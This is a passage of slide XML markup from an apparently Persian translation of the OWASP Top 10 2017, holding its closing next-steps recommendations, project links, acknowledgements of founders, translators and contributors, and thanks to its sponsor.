                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ما یک سری پیشنهاد به عنوان قدم بعدی برای کاربران مختلف </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>، شامل قدم بعدی برای توسعه دهندگان ، قدم بعدی برای ارزیاب های امنیت، قدم بعدی برای سازمان ها که مناسب برای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>CIO </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>CISO </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> ها است ، قدم بعدی برای مدیران برنامه ها که مناسب برای مدیران برنامه ها و هرکسی که مسئول چرخه‌ی حیات برنامه است، نوشته ایم.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>در دراز مدت، ما به تمام تیم های توسعه نرم افزار توصیه میکنیم که یک برنامه امنیت نرم افزار که با الگو و تکنولوژی ما سازگاری دارد ایجاد کنند. این برنامه ها در اشکال و سایزهای مختلف ارایه میشوند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR"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pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>قدرت فعلی اندازه گیری و بهبود امنیت برنامه های خود را با استفاده از مدل </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Software Assurance Maturity </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> افزایش دهید.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR"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pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>امیدواریم که </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> برای اقدامات امنیت نرم افزار شما مفید باشد. لطفا با ما در تماس باشید و سوالات، نظرات و ایده های خود را در مخزن پروژه گیت هاب ما ، با </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> در میان بگذارید.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR"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pPr lvl="0" algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" u="sng" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>شما میتوانید پروژه ی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> و ترجمه هایش را اینجا پیدا کنید :</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" u="sng" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" u="sng" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>در پایان ، دوست داریم که از رهبران موسس </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>، آقایان </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Dave </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Wichers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Jeff Williams </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> برای تمام تلاش‌ها و اعتقادی که برای اتمام پروژه با کمک جامعه به ما داشتند تشکر کنیم. از شما ممنونیم.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Andrew van der Stock</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Brian </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Glas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Neil </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Smithline</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Torsten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Gigler</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="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600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1200" b="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r h="338577">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>اسپانسری پروژه</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">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2890284831"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1525622">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>از </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Autodesk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="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fa-IR" sz="950" b="0" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> برای اسپانسری </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 – 2017 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> تشکر میکنیم.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="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r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" b="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" u="none" kern="120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extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr xmlns="" xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>سازمان ها و افرادی که در دادن اطلاعات در مورد آسیب های شایع یا دیگر موارد همکاری کردند در این آدرس لیست شده اند :</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
